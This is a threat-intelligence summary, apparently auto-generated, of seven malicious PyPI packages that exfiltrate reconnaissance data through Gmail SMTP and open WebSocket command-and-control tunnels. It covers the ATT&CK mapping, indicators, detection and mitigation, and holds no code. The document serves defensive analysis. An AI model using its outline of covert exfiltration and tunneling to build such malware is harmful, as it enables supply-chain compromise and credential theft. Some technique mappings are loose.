Full Report
Seven malicious PyPi packages were found using Gmail's SMTP servers and WebSockets for data exfiltration and remote command execution. [...]
Analysis Summary
# Tool/Technique: Malicious PyPI Packages (Gmail Abuse/WebSocket Tunneling)
## Overview
This refers to a set of malicious packages distributed via the Python Package Index (PyPI) designed to establish covert, bidirectional remote access tunnels to compromised systems after initial reconnaissance via Gmail abuse.
## Technical Details
- Type: Malware/Supply Chain Attack
- Platform: Systems running Python environments that install the packages (likely Linux/Windows/macOS development environments).
- Capabilities: Covert command and control (C2), remote access via WebSocket tunneling, reconnaissance, data exfiltration (email/credentials).
- First Seen: Not explicitly stated for the PyPI packages, but the underlying techniques leveraging trusted services (Gmail) are observed in recent campaigns.
## MITRE ATT&CK Mapping
This attack involves multiple stages of adversary behavior:
- **TA0001 - Initial Access (via Supply Chain)**
- T1195.002 - T1195.002 - Compromise Software Supply Chain: Compromise Software Supply Chain (Installing malicious packages from PyPI).
- **TA0011 - Command and Control**
- T1071.001 - T1071.001 - Application Layer Protocol: Web Protocols (Using non-standard web protocols like WebSocket over SSL for C2).
- **TA0010 - Exfiltration**
- T1048 - T1048 - Exfiltration Over Alternative Protocol (Exploiting Gmail SMTP for initial exfiltration).
- **TA0005 - Defense Evasion**
- T1027 - T1027 - Obfuscated Files or Information (Using trusted services like Gmail to hide C2 traffic).
## Functionality
### Core Capabilities
- **Reconnaissance via Gmail Abuse:** The malware uses hardcoded Gmail credentials to log into `smtp.gmail.com` to send initial reconnaissance data to the attacker. This method aims to bypass firewalls and EDR systems by leveraging a legitimate, trusted service (Gmail).
- **Persistent C2 Tunneling:** After the initial signaling email, the implant initiates a connection to a remote server over **WebSocket over SSL**. This establishes an encrypted, bidirectional tunnel.
### Advanced Features
- **Bidirectional Tunneling Control:** The malware utilizes a 'Client' class to forward traffic from the remote host (attacker) through the established tunnel to the local (compromised) system.
- **Versatile Remote Access:** The tunnel enables administrative functions on the host, including:
- Internal admin panel and API access.
- File transfer.
- Shell command execution.
- Credentials harvesting.
- Lateral movement assistance.
- Email exfiltration.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: [Not provided in the context, depends on the specific package name]
- Registry Keys: [Not provided in the context]
- Network Indicators:
- Traffic directed to `smtp.gmail.com` using hardcoded credentials.
- WebSocket connections over SSL to attacker-controlled remote servers (C2 infrastructure).
- Behavioral Indicators:
- Installation of unrecognized Python packages from PyPI.
- Outbound communication utilizing the WebSocket protocol for persistent connections.
- Outbound emails sent via Gmail SMTP using suspicious or hardcoded credentials.
## Associated Threat Actors
- [Not explicitly named for these specific PyPI packages, but the sophisticated use of trusted services suggests organized actors, often linked to cybercrime/espionage.]
## Detection Methods
- Signature-based detection: [Requires signatures for specific malicious package hashes/names, which are transient.]
- Behavioral detection: Monitoring for Python processes initiating persistent WebSocket connections or unusual authenticated outbound SMTP traffic (especially using embedded credentials).
- YARA rules: [Not provided in the context]
## Mitigation Strategies
- **Immediate Action:** Immediately remove any recently installed suspicious PyPI packages.
- **Credential Rotation:** Rotate all Gmail credentials that may have been compromised or hardcoded within the environment.
- **Supply Chain Security:** Use dependency scanning tools, maintain strict allow-lists for third-party libraries, and verify the reputation/authorship of packages installed from public repositories like PyPI.
- **Network Monitoring:** Monitor outbound traffic for non-standard use of legitimate services (e.g., unexpected WebSocket connections appearing outside established application flows, or unusual SMTP activity).
## Related Tools/Techniques
- **Crypto Stealer (Related npm package):** The package `crypto-encrypt-ts` (npm) used similar supply chain tactics to steal cryptocurrency wallet secrets and environment variables by masquerading as a standard library (`CryptoJS`).
- **Tunneling Malware:** Tools that utilize protocols like WebSocket or DNS for covert C2 communication.
- **Living off the Land (LotL) C2:** Techniques leveraging trusted infrastructure like Gmail or standard protocols (HTTPS/TLS) to evade security controls.